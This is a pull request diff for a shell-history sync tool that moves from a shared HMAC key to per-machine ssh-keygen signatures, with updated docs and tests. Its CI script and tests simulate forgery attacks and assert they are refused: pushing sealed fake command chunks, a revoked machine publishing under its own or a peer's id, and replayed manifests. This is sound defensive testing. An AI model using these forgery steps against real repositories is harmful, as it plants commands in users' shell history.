### PR TITLE
Sign what each machine publishes, so a revoked one cannot publish at all

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -44,6 +44,11 @@ jobs:
         # Sync tests skip themselves without it, and a silently skipped suite
         # looks exactly like a passing one.
         run: sudo apt-get update -qq && sudo apt-get install -y -qq age
+      - name: ssh-keygen is present
+        # Signing needs it. Present on ubuntu-latest, asserted rather than
+        # assumed for the same reason as bash below: a silently skipped suite
+        # looks exactly like a passing one.
+        run: ssh-keygen -Y sign -h 2>&1 | head -1; command -v ssh-keygen
       - name: bash version
         # The hook needs bash 5 for $EPOCHSECONDS / $EPOCHREALTIME. ubuntu-latest
         # ships it, but fail loudly rather than silently skipping the hook tests.
@@ -79,7 +84,7 @@ jobs:
         with:
           python-version: "3.12"
       - run: sudo apt-get update -qq && sudo apt-get install -y -qq age
-      - run: age --version && git --version
+      - run: age --version && git --version && command -v ssh-keygen
       - name: sync suite
         run: |
           set -o pipefail
@@ -182,9 +187,11 @@ jobs:
           run_as beta sync
           run_as beta list --scope global | grep -q 'secret-marker-command'
 
-          # The point of the tag: a chunk none of these machines wrote is
-          # refused. Sealed to alpha's published day key, which is in the clear
-          # on purpose, so this is exactly what push access alone can build.
+          # The point of the signature: a chunk none of these machines put its
+          # name to is refused. Sealed to alpha's published day key, which is in
+          # the clear on purpose, so this is exactly what push access alone can
+          # build -- and it is a perfectly well-formed chunk. What the attacker
+          # cannot do is get it into a manifest alpha signed.
           ATTACK="$BASE/attacker"
           git clone --quiet "$BASE/origin.git" "$ATTACK"
           DAY_PUB=$(cat "$ATTACK/hosts/$ALPHA_ID/keys/2023-11-14.pub")
@@ -198,3 +205,18 @@ jobs:
 
           run_as beta sync
           ! run_as beta list --scope global | grep -q 'forged-marker-command'
+
+          # The other direction, which is the ceremony this design costs: alpha
+          # cloned before beta existed, so it has never been told to accept
+          # beta. Its history is refused until a human at alpha says otherwise.
+          BETA_ID=$(grep '^id=' "$BASE/beta/conf/woswoar/machine" | cut -d= -f2)
+          mkdir -p "$BASE/beta/data/logs/hosts/$BETA_ID"
+          printf '1700000100\ts1\t~\t0\t5\tbeta-marker-command\n' \
+            > "$BASE/beta/data/logs/hosts/$BETA_ID/2023-11-14.tsv"
+          run_as beta sync
+          run_as alpha sync
+          ! run_as alpha list --scope global | grep -q 'beta-marker-command'
+
+          run_as alpha trust --yes
+          run_as alpha sync
+          run_as alpha list --scope global | grep -q 'beta-marker-command'

--- a/README.md
+++ b/README.md
@@ -80,18 +80,28 @@ including days recorded before it ever existed:
 Grant all 2 machines full access? [y/N]
 ```
 
-That one command finishes onboarding in both directions: it is what lets the
-newcomer read history from before it existed, *and* what hands it the key every
-chunk is authenticated with, so its own commands start publishing too.
+That is what lets the newcomer read history from before it existed. It starts
+publishing its own commands straight away, without waiting for anything: it
+signs them with a key of its own.
 
-Until you run it the new machine keeps recording locally and says what it is
-waiting for. Nothing is lost — the backlog is published in full by the first
-sync after `grant`.
+The other direction needs one more step, on each machine that will read the
+newcomer:
 
-Authentication matters because the history repo is somewhere anyone with push
-access could write. Every chunk carries a tag computed with a key only your
-enrolled machines can open, checked before the chunk is decrypted, so a repo
-someone else can push to cannot put a command into your Ctrl-R.
+```console
+$ woswoar trust
+These machines publish history this one has not been told to accept.
+
+  SHA256:2xQ5…  'martin@work-laptop'
+
+Accept history from 1 machine(s) here? [y/N]
+```
+
+That is deliberate. The history repo is somewhere anyone with push access can
+write, so every machine signs what it publishes and each of your machines
+decides for itself whose signature it believes — a decision that cannot be kept
+in the repository, because the repository is the thing it defends against.
+Revoking a machine removes that decision everywhere automatically, since taking
+trust away can only ever cause a refusal.
 
 > [!TIP]
 > `.bashrc` is written with `$HOME` rather than your username, so one shared

--- a/docs/security.md
+++ b/docs/security.md
@@ -24,9 +24,11 @@ shells out to
 tool with one job. woswoar's crypto module is a
 [small subprocess wrapper](../woswoar/crypto.py). There is no key derivation, no
 nonce management and no mode selection to get wrong, because none of it lives
-here. The one primitive woswoar does call directly is `hmac` from the standard
-library, for the chunk tags above — the one with no nonce, no mode, no padding
-and a constant-time comparison provided for you.
+here. Signatures are the same story: `ssh-keygen -Y sign` and `-Y verify`, the
+tool that is already on the machine because you push to git with it. woswoar
+composes no primitive of its own — the manifest it signs is a list of filenames
+and SHA-256 digests, and everything cryptographic about it happens inside
+somebody else's audited binary.
 
 woswoar also never hands age a *path* — it reads key files itself and pipes the
 bytes. That sounds like a detail until you meet a sandboxed age that can run
@@ -43,30 +45,67 @@ writing a chunk never has to open the sealed one. On its own that means
 **anyone who can push to the repo could seal a chunk every machine would open
 and offer you in Ctrl-R**, one keypress from running.
 
-So the repo also holds a random authentication key, sealed to the recipients
-exactly like a day key, and every chunk carries an HMAC-SHA256 tag over its
-ciphertext. Chunks are authenticated *before* they are decrypted, so a chunk
-your machines did not write is never opened at all.
+So every machine signs what it publishes. Each one holds an Ed25519 key that
+never leaves it, and per day it signs a **manifest** — the list of chunks it
+published that day and their digests. A chunk is opened only if a manifest
+signed by the machine whose directory it sits in vouches for exactly those
+bytes. Signing and verification are `ssh-keygen -Y`, which you already have.
 
-Holding that key is the same thing as being one of your enrolled machines, so
-this needs no new command and no new key to manage: `woswoar grant`, which
-already re-seals the per-day keys to a newly enrolled machine, re-seals this one
-too.
+Once per day and machine, not once per chunk: an earlier attempt signed each
+chunk and cost 3.3 ms every time, so a machine waiting to be granted access
+re-checked the whole archive on every timer tick and never finished. A manifest
+turns a year of three machines from nearly two minutes into about 3.6 seconds.
+
+<details>
+<summary>Why not one shared key, which is simpler?</summary>
+
+Because it was, and it could not be made to work. Until #38 the repo held one
+HMAC key sealed to all recipients, and any machine that had ever been enrolled
+kept those 32 bytes forever — so a machine you had **revoked** could still
+publish history every other machine believed.
+
+That is not a bug in the arrangement, it is the arrangement: with any shared
+secret, whoever can *check* a chunk can *forge* one. Rotating the key does not
+help, because every existing chunk was tagged with the old one and a machine
+cloning fresh would refuse the whole archive. Only asymmetric signatures
+separate "can verify" from "can sign", which is why each machine now has a key
+of its own and why nobody else ever needs the private half.
+
+</details>
 
 <details>
 <summary>What this does and does not stop</summary>
 
 Stopped: anyone with push access to the repo — a stolen token, a mis-scoped
 deploy key, the git host itself — fabricating history or tampering with what a
-machine already published.
+machine already published. Also stopped, and this is what #38 added: a machine
+you have revoked, which still holds its own signing key and every manifest it
+ever signed, but no longer has a peer willing to accept them.
 
-Not stopped: one of your *own* enrolled machines. The key is shared across them,
-so a compromised machine could publish history attributed to another of your
-machines. It could already publish anything under its own name and read
-everything, so the marginal loss is attribution between machines you own — the
-deliberate trade for having no per-machine keys to accept, compare or revoke.
+Not stopped: one of your *own* currently enrolled machines, publishing under its
+own name. It is a machine you trust; that is what trusting it means.
 
 </details>
+
+## 🤝 Each machine decides for itself which machines it believes
+
+The signing keys are published in the repo — and the repo is exactly what this
+defends against, since anyone who can push can rewrite `hosts/<id>/signer.pub`
+along with the history it vouches for. So what a machine *believes* is kept
+outside the repo, in its own `state.json`, and:
+
+> **Repo state may only ever remove trust, never add it.**
+
+Adding needs a person at that machine (`woswoar trust`, which shows a
+fingerprint and writes nothing to the repository). Removing is safe to do
+automatically, because it can only ever cause a refusal and never an injection —
+so a revocation published by any of your machines takes effect on all of them at
+their next sync, with nobody having to run anything.
+
+The cost is real and worth stating: **enrolling a machine now needs `woswoar
+trust` on each machine that will read it**, on top of `woswoar grant` once. A
+machine that clones later pins whatever it finds at that moment, so the ceremony
+only runs in one direction.
 
 ## 🔑 No secret is ever copied between machines
 
@@ -101,10 +140,12 @@ What it does **not** do, all three said on screen before you confirm:
 - **It does not revoke git access.** If the key got in through a stolen token or
   a mis-scoped deploy key, that credential needs rotating too, or it can simply
   fetch again.
-- **It does not stop that machine writing history yours will accept.** The
-  authentication key above is shared across your fleet, and rotating it would
-  make every existing chunk fail authentication, so it cannot be rotated without
-  rebuilding the repo.
+What it **does** do, and this is what #38 added: from that moment nothing that
+machine publishes is accepted by any of your machines, under its own name or
+anyone else's. It keeps its signing key — nobody can take that back — but every
+peer drops it on the next sync, with nobody having to run anything. The cost is
+that history it published *before* the revocation and your machines have not
+merged yet is refused too, so sync them first if you want it.
 
 There is also a bounded window on reads: a day key is minted once and every
 chunk of that day is sealed to it, so commands recorded on a day whose key
@@ -167,9 +208,13 @@ Claims rot. The ones that matter are asserted in CI on every push:
 | Shell and Python escaping agree | a command containing a literal tab and newline must round-trip byte-for-byte |
 | History is never rewritten | `git log --diff-filter=MD` over chunk files must be **empty** |
 | age is never given a file path | every age invocation is inspected; no argument may be an existing path outside `/dev/fd` |
-| Forged history is refused | a chunk sealed to a host's published day key, but untagged, is rejected and reported |
+| Forged history is refused | a chunk sealed to a host's published day key, but absent from that host's signed manifest, is rejected and reported |
 | Tampering is refused | flipping one byte of a real chunk fails authentication, not merely decryption |
-| The repo key never leaks | the key's bytes appear nowhere in the committed tree |
+| A revoked machine cannot publish | it keeps its signing key and its old manifests, signs a chunk with them, pushes -- and a third machine accepts none of it |
+| Nor under another machine's name | the same, written into a peer's host directory, where that peer never looks |
+| A manifest cannot be moved | a real, correctly signed manifest copied to another day is refused; host and day are inside the signed bytes |
+| A machine never signs what it did not write | a chunk planted under a machine's own id stays out of the manifest it signs, and is reported |
+| A changed signing key is never waved through | the peer refuses, keeps the old pin, and says so |
 | A revoked machine stops receiving history | two real machines through a bare repo: after `revoke`, the revoked one still has what came before and never gets what comes after |
 | A revocation cannot be undone by pushing | re-adding the key, by command or by appending the line, leaves it subtracted |
 | A recalled command is one command | control characters never survive from the picker into the shell buffer |
@@ -192,17 +237,27 @@ Being straight about the limits is part of the security story:
 >   not your disk. Use full-disk encryption for that.
 > - **Metadata leaks.** Anyone with the repo can see how many machines you have,
 >   when they synced, and roughly how many commands you ran per day.
-> - **One key across your machines.** Authentication proves a chunk came from
->   your fleet, not which machine in it. See the note above.
+> - **Trust on first use.** Cloning pins whatever machines the repository shows
+>   at that moment. A machine planted *before* you clone is accepted; one that
+>   appears afterwards is refused until you say otherwise. `woswoar init` prints
+>   the fingerprints it pinned, and that printout is the only thing standing
+>   between you and a repository that lied at exactly the right moment.
+> - **A confirmation on every machine.** Enrolling a laptop needs `woswoar
+>   trust` on each machine that will read it. That is the price of an anchor the
+>   remote cannot rewrite.
 > - **Secrets you type are still secrets.** `WOSWOAR_IGNORE` skips
 >   credential-shaped commands by default (`*TOKEN=`, `*SECRET=`, `--password`,
 >   …), and bash's own `HISTCONTROL`/`HISTIGNORE` are honoured for free — but no
 >   pattern catches everything.
 > - **Lose your key, lose your access.** There is no recovery service, because
 >   there is no service. If a machine loses its identity, re-enrol it and run
->   `woswoar grant` from another machine.
-> - **Revoking is forward-looking only.** `woswoar revoke` stops a machine
->   receiving new history; it cannot take back what was already published, and
->   the revoked machine keeps the shared authentication key, so it can still
->   write history your machines accept. A key that has genuinely fallen into
->   someone else's hands is a reason to rebuild the repo, not only to revoke.
+>   `woswoar grant` from another machine. If it loses its *signing* key it mints
+>   a new one and carries on recording, but every peer refuses its history until
+>   a human there runs `woswoar trust --replace` — deliberately, because a
+>   changed signing key and an impersonation look identical from the outside.
+> - **Revoking cannot take back what was already published.** `woswoar revoke`
+>   stops a machine both reading and publishing from that moment on, but a copy
+>   it already made is a copy it keeps. It also refuses history that machine
+>   published *before* the revocation which your other machines had not merged
+>   yet, so sync them first if you want it. A key that has genuinely fallen into
+>   someone else's hands is still a reason to rebuild the repo.

--- a/tests/test_crypto.py
+++ b/tests/test_crypto.py
@@ -13,7 +13,7 @@ import unittest
 from pathlib import Path
 from unittest import mock
 
-from woswoar import crypto, store
+from woswoar import crypto
 
 from .support import requires_age, requires_ssh_keygen
 
@@ -187,29 +187,55 @@ class TestFingerprint(unittest.TestCase):
         self.assertIn("age-keygen", crypto.how_to_check(crypto.fingerprint("age1qqqqwwwwww")))
 
 
-class TestChunkFraming(unittest.TestCase):
-    def test_the_tag_width_store_uses_matches_the_one_crypto_produces(self) -> None:
-        """`store` deliberately does not import `crypto`.
+#: Any namespace will do for these; `sync` owns the real one.
+NS = "woswoar-test"
 
-        `crypto` pulls in subprocess and shutil at module scope, and `store` is
-        imported on every Ctrl-R -- so the width is spelled out in both, and the
-        only thing keeping them equal is this. If they drift, every chunk in an
-        append-only repo is framed at one width and read at another.
+
+@requires_ssh_keygen
+class TestSigning(unittest.TestCase):
+    """Authorship, which age cannot answer and a shared secret cannot either."""
+
+    def setUp(self) -> None:
+        tmp = tempfile.TemporaryDirectory(prefix="woswoar-sign-")
+        self.addCleanup(tmp.cleanup)
+        self.tmp = Path(tmp.name)
+        self.key = self.tmp / "signing_key"
+        self.public = crypto.generate_signing_key(self.key)
+
+    def test_a_signature_round_trips(self) -> None:
+        signature = crypto.sign(b"a manifest", self.key, NS)
+        self.assertTrue(crypto.verify(b"a manifest", signature, self.public, NS))
+
+    def test_tampered_data_does_not_verify(self) -> None:
+        signature = crypto.sign(b"a manifest", self.key, NS)
+        self.assertFalse(crypto.verify(b"a manifest!", signature, self.public, NS))
+
+    def test_another_machines_signature_does_not_verify(self) -> None:
+        # The property the whole design rests on: holding the *verify* half is
+        # not holding the ability to sign, which is what a shared MAC could
+        # never give and what makes revocation mean anything.
+        other = self.tmp / "other_key"
+        crypto.generate_signing_key(other)
+        signature = crypto.sign(b"a manifest", other, NS)
+        self.assertFalse(crypto.verify(b"a manifest", signature, self.public, NS))
+
+    def test_a_signature_from_another_namespace_does_not_verify(self) -> None:
+        """Namespaces stop a signature made for one purpose counting for another.
+
+        Mutating the namespace to "" must break this, which is what pins that it
+        is actually being passed.
         """
-        self.assertEqual(store._TAG_BYTES, crypto.TAG_BYTES)
-        self.assertEqual(len(crypto.tag(crypto.new_mac_key(), b"x")), store._TAG_BYTES)
+        signed = subprocess.run(
+            ["ssh-keygen", "-Y", "sign", "-q", "-f", str(self.key), "-n", "a-different-namespace"],
+            input=b"a manifest",
+            capture_output=True,
+            check=True,
+            timeout=60,
+        ).stdout
+        self.assertFalse(crypto.verify(b"a manifest", signed, self.public, NS))
 
-    def test_a_chunk_round_trips_through_its_frame(self) -> None:
-        key = crypto.new_mac_key()
-        sealed = b"pretend-this-is-age-output"
-        blob = store.frame_chunk(sealed, crypto.tag(key, sealed))
-        back, tag = store.split_chunk(blob)
-        self.assertEqual(back, sealed)
-        self.assertTrue(crypto.tag_matches(key, back, tag))
-
-    def test_a_blob_too_short_to_be_framed_is_rejected(self) -> None:
-        with self.assertRaises(ValueError):
-            store.split_chunk(b"x" * store._TAG_BYTES)
+    def test_the_private_half_is_owner_only(self) -> None:
+        self.assertEqual(self.key.stat().st_mode & 0o777, 0o600)
 
 
 if __name__ == "__main__":

--- a/tests/test_deps.py
+++ b/tests/test_deps.py
@@ -107,14 +107,14 @@ class TestInstallWarnsAboutMissingTools(WoswoarTestCase):
         # failure -- the hook really was installed.
         self.assertEqual(code, 0)
         self.assertIn("woswoar.bash", out.getvalue())
-        for tool in ("fzf", "age", "git"):
+        for tool in ("fzf", "age", "git", "ssh-keygen"):
             self.assertIn(tool, err.getvalue())
 
     def test_a_complete_machine_says_nothing(self) -> None:
         # Put the tools back so `missing()` finds them.
         binaries = self.root / "fullbin"
         binaries.mkdir()
-        for name in ("fzf", "age", "git"):
+        for name in ("fzf", "age", "git", "ssh-keygen"):
             script = binaries / name
             script.write_text("#!/bin/sh\nexit 0\n")
             script.chmod(script.stat().st_mode | stat.S_IXUSR)

--- a/tests/test_sync.py
+++ b/tests/test_sync.py
@@ -20,7 +20,6 @@ from pathlib import Path
 from woswoar import cache, crypto, search, store, sync
 from woswoar.__main__ import _GRANT_REMEDY, main
 from woswoar.entry import Entry, format_line
-from woswoar.errors import WoswoarError
 from woswoar.sync import COMMIT_MESSAGE as COMMIT
 
 from . import support
@@ -134,6 +133,18 @@ class SyncTestCase(unittest.TestCase):
     def git_in_repo(self, fake: Fake, *args: str) -> str:
         with fake.active():
             return sync.git(*args)
+
+    def accept_everyone(self, fake: Fake) -> None:
+        """Accept every machine publishing here, as a human at ``fake`` would.
+
+        The ceremony this design costs, and only in one direction: a machine
+        that cloned *after* another enrolled pinned it on the spot, but one that
+        cloned before has never been told the newcomer exists. What the repo
+        says can never add trust on its own -- anyone who can push can write to
+        it -- so a person at this machine has to say so.
+        """
+        with fake.active():
+            sync.trust(sync.trust_candidates())
 
     def run_cli(self, fake: Fake, *argv: str) -> tuple[int, str]:
         """Drive the real CLI as ``fake``, returning ``(exit code, stdout)``.
@@ -256,17 +267,16 @@ class TestTwoMachines(SyncTestCase):
             # alpha's day key and the repo key, so it still cannot read
             # anything, and above all cannot authorise itself to.
             self.assertGreater(report.skipped, 0)
-            self.assertTrue(sync.run().needs_grant)
+            self.assertTrue(sync.run().unreadable)
             self.assertEqual(beta.commands(), set())
 
-    def test_a_machine_waiting_for_grant_reports_and_loses_nothing(self) -> None:
+    def test_a_machine_waiting_for_grant_publishes_at_once_and_only_reads_later(self) -> None:
         """The state between `init` and `grant`, which is normal, not an error.
 
-        A machine that has not been granted access holds no repo key, so it can
-        neither authenticate what others wrote nor tag what it writes. That is
-        reported rather than raised -- the timer fires every minute -- and the
-        backlog it recorded meanwhile is published *in full* by the first sync
-        after `grant`, which is the property that makes waiting safe.
+        Publishing needs nothing from anybody: this machine signs with a key of
+        its own and seals to a day key it mints itself. Only *reading* waits.
+        That is a change -- under the shared key it could not tag a chunk
+        either, so its own history piled up locally until someone else acted.
         """
         alpha = self.machine("alpha")
         with alpha.active():
@@ -277,35 +287,21 @@ class TestTwoMachines(SyncTestCase):
         with beta.active():
             beta.record("2023-11-15", 1_700_100_000, "beta's own command")
             report = sync.run()
-            self.assertTrue(report.needs_grant)
-            self.assertEqual(report.lines_exported, 0)
-            self.assertEqual(beta.commands(), {"beta's own command"})  # recorded locally
+            self.assertEqual(report.lines_exported, 1, "beta should publish without waiting")
+            self.assertTrue(report.unreadable, "but it cannot read alpha's history yet")
+            self.assertEqual(beta.commands(), {"beta's own command"})
+
+        # And alpha, which cloned first, sees it once a human there accepts it.
+        self.accept_everyone(alpha)
+        with alpha.active():
+            self.assertEqual(sync.run().lines_imported, 1)
+            self.assertIn("beta's own command", alpha.commands())
 
         with alpha.active():
             sync.grant()
-
-        with beta.active():
-            report = sync.run()
-            self.assertFalse(report.needs_grant)
-            self.assertEqual(report.lines_exported, 1, "the backlog was not published")
-            self.assertEqual(beta.commands(), {"git status", "beta's own command"})
-
-    def test_bidirectional(self) -> None:
-        alpha = self.machine("alpha")
-        beta = self.machine("beta")
-        with alpha.active():
-            alpha.record("2023-11-14", 1_700_000_001, "from alpha")
-            sync.run()
-            sync.grant()
-        with beta.active():
-            beta.record("2023-11-14", 1_700_000_050, "from beta")
-            sync.run()
-        with alpha.active():
-            sync.run()
-            self.assertEqual(alpha.commands(), {"from alpha", "from beta"})
         with beta.active():
             sync.run()
-            self.assertEqual(beta.commands(), {"from alpha", "from beta"})
+            self.assertEqual(beta.commands(), {"beta's own command", "git status"})
 
     def test_merging_is_idempotent(self) -> None:
         alpha = self.machine("alpha")
@@ -401,21 +397,32 @@ class TestImmutability(SyncTestCase):
             "--",
             "hosts",
         )
-        rewritten = {line for line in touched.splitlines() if line.endswith(".age")}
+        # Every rewritten path, not just the `*.age` ones. Filtering by suffix
+        # first made the allowlist below vacuous for anything not named `.age`,
+        # so a rewritten manifest -- or any future file -- would have sailed
+        # through an assertion that reads like it covers the tree.
+        rewritten = {line for line in touched.splitlines() if line.strip()}
 
-        # Chunks live under hosts/<id>/YYYY-MM-DD/. Key files and name seals sit
-        # elsewhere in the tree and *are* rewritten, by design: that is exactly
-        # what makes onboarding cheap. Separating the two here keeps the
-        # exception explicit rather than quietly widening the invariant.
-        # Classified by store, not by a regex copied here: a hand-maintained
-        # pattern would silently stop matching if the layout ever changed,
-        # leaving this assertion vacuously true while real chunks were rewritten.
+        # Chunks live under hosts/<id>/YYYY-MM-DD/. Key files, name seals,
+        # signer keys and manifests sit elsewhere in the tree and *are*
+        # rewritten, by design: that is what makes onboarding cheap and what
+        # lets a day's signed list grow as the day goes on. Separating the two
+        # here keeps the exception explicit rather than quietly widening the
+        # invariant. Classified by store, not by a regex copied here: a
+        # hand-maintained pattern would silently stop matching if the layout
+        # changed, leaving this vacuously true while real chunks were rewritten.
         chunks = {p for p in rewritten if store.is_chunk_path(p)}
         self.assertEqual(sorted(chunks), [], f"chunks were rewritten: {sorted(chunks)}")
 
         # And the only things that were rewritten are the ones allowed to be.
+        allowed = ("/keys/", "/manifests/")
         self.assertTrue(
-            all(("/keys/" in p or p.endswith("/name.age")) for p in rewritten),
+            all(
+                any(part in p for part in allowed)
+                or p.endswith("/name.age")
+                or p.endswith("/signer.pub")
+                for p in rewritten
+            ),
             f"unexpected rewrites: {sorted(rewritten - chunks)}",
         )
 
@@ -676,13 +683,14 @@ class TestRevokeSubtraction(SyncTestCase):
 
         with alpha.active():
             sync.grant(approved=[reader.key for reader in sync.readers()])
+            sealed = store.name_seal(store.machine().id)
             # Opens for beta here, which is what makes the failure below a
             # consequence of the revocation rather than of never having access.
-            crypto.decrypt_with_file(store.mac_key_file().read_bytes(), beta_identity)
+            crypto.decrypt_with_file(sealed.read_bytes(), beta_identity)
 
             report = sync.revoke(sync.find_reader(crypto.fingerprint(beta_key)))
             self.assertGreater(report.resealed, 0)
-            resealed = store.mac_key_file().read_bytes()
+            resealed = sealed.read_bytes()
 
         with self.assertRaises(crypto.AgeError):
             crypto.decrypt_with_file(resealed, beta_identity)
@@ -765,7 +773,6 @@ class TestRevokeSubtraction(SyncTestCase):
 
         with beta.active():
             report = sync.run()
-        self.assertTrue(report.needs_grant)
         self.assertTrue(report.revoked)
 
         buffer = io.StringIO()
@@ -777,12 +784,15 @@ class TestRevokeSubtraction(SyncTestCase):
 
     def test_a_machine_merely_waiting_for_a_grant_is_not_told_it_was_revoked(self) -> None:
         alpha = self.machine("alpha")
-        beta = self.machine("beta")
         with alpha.active():
+            # Published *before* beta exists, so its day key is sealed to a list
+            # beta is not on. That is the only thing `grant` is still needed for.
+            alpha.record("2023-11-14", 1_700_000_001, "sealed before beta joined")
             sync.run()
+        beta = self.machine("beta")
         with beta.active():
             report = sync.run()
-        self.assertTrue(report.needs_grant)
+        self.assertTrue(report.unreadable, "beta is waiting for a grant, not revoked")
         self.assertFalse(report.revoked)
 
     def test_a_key_shaped_like_a_tombstone_is_refused(self) -> None:
@@ -790,6 +800,177 @@ class TestRevokeSubtraction(SyncTestCase):
         with alpha.active(), self.assertRaises(sync.SyncError) as caught:
             sync.add_recipient(f"-{crypto.generate_identity().public}", label="sneaky")
         self.assertIn("may not start with", str(caught.exception))
+
+
+class TestARevokedMachineCannotPublish(SyncTestCase):
+    """Issue #38, which is the whole point of per-machine signatures.
+
+    A revoked machine keeps its own signing key -- nobody can take it back --
+    and keeps every manifest it ever signed. What it loses is any peer willing
+    to accept them. That is only expressible because signing is asymmetric: with
+    the shared MAC these tests replaced, holding the key to *check* a chunk was
+    holding the key to *forge* one, so a revoked machine could publish forever.
+    """
+
+    def fleet(self) -> tuple[Fake, Fake, Fake]:
+        """alpha and beta enrolled and readable, gamma accepting both."""
+        alpha = self.machine("alpha")
+        beta = self.machine("beta")
+        gamma = self.machine("gamma")
+        with alpha.active():
+            # alpha publishes, so its day key exists for the cross-host test to
+            # seal against -- which is exactly what an attacker would find.
+            alpha.record("2023-11-14", 1_700_000_000, "alpha-history")
+            sync.run()
+            sync.grant(approved=[reader.key for reader in sync.readers()])
+        for machine in (beta, gamma):
+            with machine.active():
+                sync.run()
+        for machine in (alpha, beta, gamma):
+            self.accept_everyone(machine)
+        return alpha, beta, gamma
+
+    def publish_as_revoked(self, beta: Fake, day: str, ts: int, cmd: str) -> None:
+        """Everything beta can still do: seal, sign with its own key, push.
+
+        Deliberately not `sync.run`, which would notice beta is revoked and stop.
+        The question is not whether beta cooperates -- it is whether refusing
+        beta is a *decision the peers make*.
+        """
+        with beta.active():
+            beta.record(day, ts, cmd)
+            known = store.machine()
+            with sync.lock():
+                sync._fetch_and_rebase()
+                sync.export(known, sync.State.load(), sync.Report(), ts)
+                sync._commit()
+                sync._push()
+
+    def revoke_beta(self, alpha: Fake, beta: Fake) -> None:
+        with beta.active():
+            beta_key = crypto.recipient_for(sync.identity_path(store.machine())).strip()
+        with alpha.active():
+            sync.revoke(sync.find_reader(crypto.fingerprint(beta_key)))
+
+    def test_a_peer_refuses_what_a_revoked_machine_signs_afterwards(self) -> None:
+        alpha, beta, gamma = self.fleet()
+        with beta.active():
+            beta.record("2023-11-14", 1_700_000_001, "legitimate-beta-history")
+            sync.run()
+        with gamma.active():
+            sync.run()
+            self.assertIn("legitimate-beta-history", gamma.commands())
+
+        self.revoke_beta(alpha, beta)
+        self.publish_as_revoked(beta, "2023-11-15", 1_700_100_002, "after-the-revocation")
+
+        with gamma.active():
+            report = sync.run()
+            self.assertIn(beta.id, report.unpinned)
+            self.assertNotIn("after-the-revocation", gamma.commands())
+
+    def test_it_cannot_publish_under_another_machines_id_either(self) -> None:
+        """The cross-host version, and the one a shared key could never stop.
+
+        beta writes into *alpha's* host directory, where alpha would never look
+        -- `merge` skips your own id -- so only the other peers judge it. It can
+        seal the chunk perfectly well; what it cannot do is sign as alpha.
+        """
+        alpha, beta, gamma = self.fleet()
+        self.revoke_beta(alpha, beta)
+
+        with beta.active():
+            day = "2023-11-14"
+            with sync.lock():
+                sync._fetch_and_rebase()
+                pub = store.day_key_public(alpha.id, day)
+                entry = Entry(1_700_000_900, alpha.id, "s1", "~", 0, 5, "planted-under-alpha")
+                sealed = crypto.encrypt_to(
+                    sync.pack((format_line(entry) + "\n").encode("utf-8")),
+                    pub.read_text(encoding="utf-8").strip(),
+                )
+                target = store.chunk_dir(alpha.id, day) / "9999999999-ffffff.age"
+                target.parent.mkdir(parents=True, exist_ok=True)
+                target.write_bytes(sealed)
+                sync._commit()
+                sync._push()
+
+        with gamma.active():
+            sync.run()
+            self.assertNotIn("planted-under-alpha", gamma.commands())
+
+    def test_a_replayed_manifest_from_before_the_revocation_is_refused_too(self) -> None:
+        """beta keeps every manifest it signed; unpinning covers the old ones."""
+        alpha, beta, gamma = self.fleet()
+        with beta.active():
+            beta.record("2023-11-14", 1_700_000_001, "before-revocation")
+            sync.run()
+        self.revoke_beta(alpha, beta)
+
+        with gamma.active():
+            sync.run()  # sees the tombstone and drops the pin
+            report = sync.run()
+            self.assertNotIn(beta.id, sync.State.load().signers)
+            self.assertIn(beta.id, report.untrusted)
+
+    def test_trust_will_not_re_accept_a_revoked_machine(self) -> None:
+        """Otherwise the withdrawal is a suggestion: whoever it was aimed at
+        holds push access, so it could simply republish and be offered again."""
+        alpha, beta, gamma = self.fleet()
+        self.revoke_beta(alpha, beta)
+        with gamma.active():
+            sync.run()
+            offered = [c.host_id for c in sync.trust_candidates()]
+        self.assertNotIn(beta.id, offered)
+
+
+class TestExportNeverSignsWhatItDidNotWrite(SyncTestCase):
+    """`merge` skips this host's own id, so a chunk planted under it is the one
+    thing nothing else ever inspects.
+
+    If `export` built its manifest by listing the day's directory, an ordinary
+    sync would sign that chunk and hand every peer something they believe --
+    without even the `compact` run the old design needed. So the manifest is
+    *extended* from the one this machine last signed, never rebuilt from disk.
+    """
+
+    def test_a_chunk_planted_under_our_own_id_is_never_signed(self) -> None:
+        alpha = self.machine("alpha")
+        with alpha.active():
+            alpha.record("2023-11-14", 1_700_000_001, "ours")
+            sync.run()
+
+            planted = store.chunk_dir(alpha.id, "2023-11-14") / "9999999999-ffffff.age"
+            planted.write_bytes(b"whatever an attacker likes")
+
+            alpha.record("2023-11-14", 1_700_000_002, "ours too")
+            report = sync.run(now=1_900_000_000)
+
+            listed = sync.read_manifest(
+                alpha.id, "2023-11-14", crypto.signing_public(store.signing_key_file())
+            )
+            self.assertNotIn(planted.name, listed, "export signed a chunk it did not write")
+            self.assertIn(f"2023-11-14/{planted.name}", report.foreign)
+
+    def test_a_peer_refuses_the_planted_chunk(self) -> None:
+        alpha = self.machine("alpha")
+        with alpha.active():
+            alpha.record("2023-11-14", 1_700_000_001, "ours")
+            sync.run()
+        beta = self.machine("beta")
+        with alpha.active():
+            sync.grant()
+            entry = Entry(1_700_000_900, alpha.id, "s1", "~", 0, 5, "planted")
+            pub = store.day_key_public(alpha.id, "2023-11-14").read_text(encoding="utf-8").strip()
+            sealed = crypto.encrypt_to(sync.pack((format_line(entry) + "\n").encode("utf-8")), pub)
+            (store.chunk_dir(alpha.id, "2023-11-14") / "9999999999-ffffff.age").write_bytes(sealed)
+            alpha.record("2023-11-14", 1_700_000_002, "ours too")
+            sync.run(now=1_900_000_000)
+
+        with beta.active():
+            sync.run()
+            self.assertNotIn("planted", beta.commands())
+            self.assertIn("ours too", beta.commands())
 
 
 class TestFindReader(SyncTestCase):
@@ -847,7 +1028,7 @@ class TestRevokeConfirmation(SyncTestCase):
         self.assertEqual(code, 0)
         self.assertIn("does not un-publish", out)
         self.assertIn("does not revoke git access", out)
-        self.assertIn("WRITING", out)
+        self.assertIn("nothing that machine publishes is accepted", out)
         with alpha.active():
             self.assertNotIn(gone, sync.recipients())
 
@@ -1110,43 +1291,98 @@ class TestSyncIsPrivate(SyncTestCase):
             self.assertEqual(exposed, [], f"sync left {exposed} readable by others")
 
 
-class TestRepoKeyIsNeverMintedTwice(SyncTestCase):
-    """Creation belongs to `initialise`, opening to everything else.
+class TestASigningKeyThatChanges(SyncTestCase):
+    """A machine that starts signing with a different key is never waved through.
 
-    `mac.age` is one shared path at the repo root, unlike a day key, which
-    lives under a host id nobody else writes. If a routine sync minted it when
-    absent, two machines on the one-minute timer would each tag chunks with a
-    key the other will never hold -- and `.gitattributes` marks ``*.age
